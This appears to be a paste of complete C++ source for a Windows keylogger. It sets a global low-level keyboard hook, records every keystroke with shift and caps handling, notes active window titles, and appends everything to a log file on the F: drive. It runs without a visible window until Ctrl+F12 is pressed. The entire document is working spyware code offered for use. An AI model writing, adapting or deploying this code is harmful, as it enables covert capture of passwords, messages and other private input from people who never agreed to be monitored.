· 6 years ago · Dec 09, 2019, 10:14 PM
1/**
2* A very basic Key logger in C++
3**/
4
5// Include header files
6#include <windows.h>
7#include <fstream>
8// Define VK - find corresponding values here: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx
9#define VK_OEM_PLUS 0xBB
10// Similarly define plus,comma, peroid
11
12// Initialize a keyboard HHOOK
13HHOOK KeyboardHook;
14
15// Function to write to a file
16void write(const char* c)
17{
18 const char* fileLocation = "F:\\log.txt"; // Define the location of log file
19 FILE* f = fopen(fileLocation, "a+"); // Open the log file in append mode
20 if (f != NULL)
21 {
22 fputs(c, f); // Write to end of the file
23 fclose(f); // Close the file
24 }
25}
26
27// The WIN API Message Loop
28void KeepAlive()
29{
30 MSG message;
31 while (GetMessage(&message, NULL, 0, 0))
32 {
33 TranslateMessage(&message);
34 DispatchMessage(&message);
35 }
36}
37
38// Unhook and exit
39void Exit()
40{
41 UnhookWindowsHookEx(KeyboardHook);
42 exit(0);
43}
44
45// Is shift key down ?
46bool shift = false;
47// Store window
48HWND oldWindow = NULL;
49// Window text
50char cWindow[MAX_PATH];
51
52// Callback function to be hooked
53LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
54{
55 bool bControlKeyDown = 0;
56 // Get current state of capsLock
57 bool caps = GetKeyState(VK_CAPITAL) < 0;
58 KBDLLHOOKSTRUCT* p = (KBDLLHOOKSTRUCT*)lParam;
59 if (nCode == HC_ACTION) {
60 // Determine the current state of shift key
61 if (p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT) {
62 if (wParam == WM_KEYDOWN)
63 {
64 shift = true;
65 }
66 else
67 {
68 shift = false;
69 }
70 }
71 // Check if F12 + CTRL is pressed, if yes -> exit
72 bControlKeyDown = GetAsyncKeyState(VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1);
73 if (p->vkCode == VK_F12 && bControlKeyDown) // If F12 and CTRL are pressed
74 {
75 Exit();
76 }
77 // Start logging keys
78 if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) // If key has been pressed
79 {
80 HWND newWindow = GetForegroundWindow();
81 if (oldWindow == NULL || newWindow != oldWindow) {
82 // Get Active window title and store it
83 GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
84 write("\nActive Window: ");
85 write(cWindow);
86 write("\n");
87 oldWindow = newWindow;
88 }
89 // Virtual key codes reference: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx
90 switch (p->vkCode) // Compare virtual keycode to hex values and log keys accordingly
91 {
92 //Number keys
93 case 0x30: write(shift ? ")" : "0"); break;
94 case 0x31: write(shift ? "!" : "1"); break;
95 case 0x32: write(shift ? "@" : "2"); break;
96 case 0x33: write(shift ? "#" : "3"); break;
97 case 0x34: write(shift ? "$" : "4"); break;
98 case 0x35: write(shift ? "%" : "5"); break;
99 case 0x36: write(shift ? "^" : "6"); break;
100 case 0x37: write(shift ? "&" : "7"); break;
101 case 0x38: write(shift ? "*" : "8"); break;
102 case 0x39: write(shift ? "(" : "9"); break;
103 // Numpad keys
104 case 0x60: write("0"); break;
105 case 0x61: write("1"); break;
106 case 0x62: write("2"); break;
107 case 0x63: write("3"); break;
108 case 0x64: write("4"); break;
109 case 0x65: write("5"); break;
110 case 0x66: write("6"); break;
111 case 0x67: write("7"); break;
112 case 0x68: write("8"); break;
113 case 0x69: write("9"); break;
114 // Character keys
115 case 0x41: write(caps ? (shift ? "a" : "A") : (shift ? "A" : "a")); break;
116 case 0x42: write(caps ? (shift ? "b" : "B") : (shift ? "B" : "b")); break;
117 case 0x43: write(caps ? (shift ? "c" : "C") : (shift ? "C" : "c")); break;
118 case 0x44: write(caps ? (shift ? "d" : "D") : (shift ? "D" : "d")); break;
119 case 0x45: write(caps ? (shift ? "e" : "E") : (shift ? "E" : "e")); break;
120 case 0x46: write(caps ? (shift ? "f" : "F") : (shift ? "F" : "f")); break;
121 case 0x47: write(caps ? (shift ? "g" : "G") : (shift ? "G" : "g")); break;
122 case 0x48: write(caps ? (shift ? "h" : "H") : (shift ? "H" : "h")); break;
123 case 0x49: write(caps ? (shift ? "i" : "I") : (shift ? "I" : "i")); break;
124 case 0x4A: write(caps ? (shift ? "j" : "J") : (shift ? "J" : "j")); break;
125 case 0x4B: write(caps ? (shift ? "k" : "K") : (shift ? "K" : "k")); break;
126 case 0x4C: write(caps ? (shift ? "l" : "L") : (shift ? "L" : "l")); break;
127 case 0x4D: write(caps ? (shift ? "m" : "M") : (shift ? "M" : "m")); break;
128 case 0x4E: write(caps ? (shift ? "n" : "N") : (shift ? "N" : "n")); break;
129 case 0x4F: write(caps ? (shift ? "o" : "O") : (shift ? "O" : "o")); break;
130 case 0x50: write(caps ? (shift ? "p" : "P") : (shift ? "P" : "p")); break;
131 case 0x51: write(caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q")); break;
132 case 0x52: write(caps ? (shift ? "r" : "R") : (shift ? "R" : "r")); break;
133 case 0x53: write(caps ? (shift ? "s" : "S") : (shift ? "S" : "s")); break;
134 case 0x54: write(caps ? (shift ? "t" : "T") : (shift ? "T" : "t")); break;
135 case 0x55: write(caps ? (shift ? "u" : "U") : (shift ? "U" : "u")); break;
136 case 0x56: write(caps ? (shift ? "v" : "V") : (shift ? "V" : "v")); break;
137 case 0x57: write(caps ? (shift ? "w" : "W") : (shift ? "W" : "w")); break;
138 case 0x58: write(caps ? (shift ? "x" : "X") : (shift ? "X" : "x")); break;
139 case 0x59: write(caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y")); break;
140 case 0x5A: write(caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z")); break;
141 // Special keys
142 case VK_SPACE: write(" "); break;
143 case VK_RETURN: write("\n"); break;
144 case VK_TAB: write("\t"); break;
145 case VK_ESCAPE: write("[ESC]"); break;
146 case VK_LEFT: write("[LEFT]"); break;
147 case VK_RIGHT: write("[RIGHT]"); break;
148 case VK_UP: write("[UP]"); break;
149 case VK_DOWN: write("[DOWN]"); break;
150 case VK_END: write("[END]"); break;
151 case VK_HOME: write("[HOME]"); break;
152 case VK_DELETE: write("[DELETE]"); break;
153 case VK_BACK: write("[BACKSPACE]"); break;
154 case VK_INSERT: write("[INSERT]"); break;
155 case VK_LCONTROL: write("[CTRL]"); break;
156 case VK_RCONTROL: write("[CTRL]"); break;
157 case VK_LMENU: write("[ALT]"); break;
158 case VK_RMENU: write("[ALT]"); break;
159 case VK_F1: write("[F1]"); break;
160 case VK_F2: write("[F2]"); break;
161 case VK_F3: write("[F3]"); break;
162 case VK_F4: write("[F4]"); break;
163 case VK_F5: write("[F5]"); break;
164 case VK_F6: write("[F6]"); break;
165 case VK_F7: write("[F7]"); break;
166 case VK_F8: write("[F8]"); break;
167 case VK_F9: write("[F9]"); break;
168 case VK_F10: write("[F10]"); break;
169 case VK_F11: write("[F11]"); break;
170 case VK_F12: write("[F12]"); break;
171 // Shift keys
172 case VK_LSHIFT: break; // Do nothing
173 case VK_RSHIFT: break; // Do nothing
174 // Symbol keys
175 case VK_OEM_1: write(shift ? ":" : ";"); break;
176 case VK_OEM_2: write(shift ? "?" : "/"); break;
177 case VK_OEM_3: write(shift ? "~" : "`"); break;
178 case VK_OEM_4: write(shift ? "{" : "["); break;
179 case VK_OEM_5: write(shift ? "|" : "\\"); break;
180 case VK_OEM_6: write(shift ? "}" : "]"); break;
181 case VK_OEM_7: write(shift ? "\"" : "'"); break;
182 case VK_OEM_PLUS: write(shift ? "+" : "="); break;
183 case VK_OEM_COMMA: write(shift ? "<" : ","); break;
184 case VK_OEM_MINUS: write(shift ? +"_" : "-"); break;
185 case VK_OEM_PERIOD: write(shift ? ">" : "."); break;
186 default:
187 DWORD dwMsg = p->scanCode << 16;
188 dwMsg += p->flags << 24;
189 char key[16];
190 GetKeyNameText(dwMsg, key, 15);
191 write(key);
192 break;
193 }
194 }
195 }
196 // Forward the event to other hooks
197 return CallNextHookEx(NULL, nCode, wParam, lParam);
198}
199
200// WinAPI main method
201int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
202{
203 // Write to file
204 write("\n--");
205 // Hook to all available threads
206 KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
207 if (KeyboardHook != NULL)
208 {
209 // Keep alive till F12 + CTRL key press is detected - can also register Hotkey
210 KeepAlive();
211 }
212 // Return and exit
213 return 0;
214}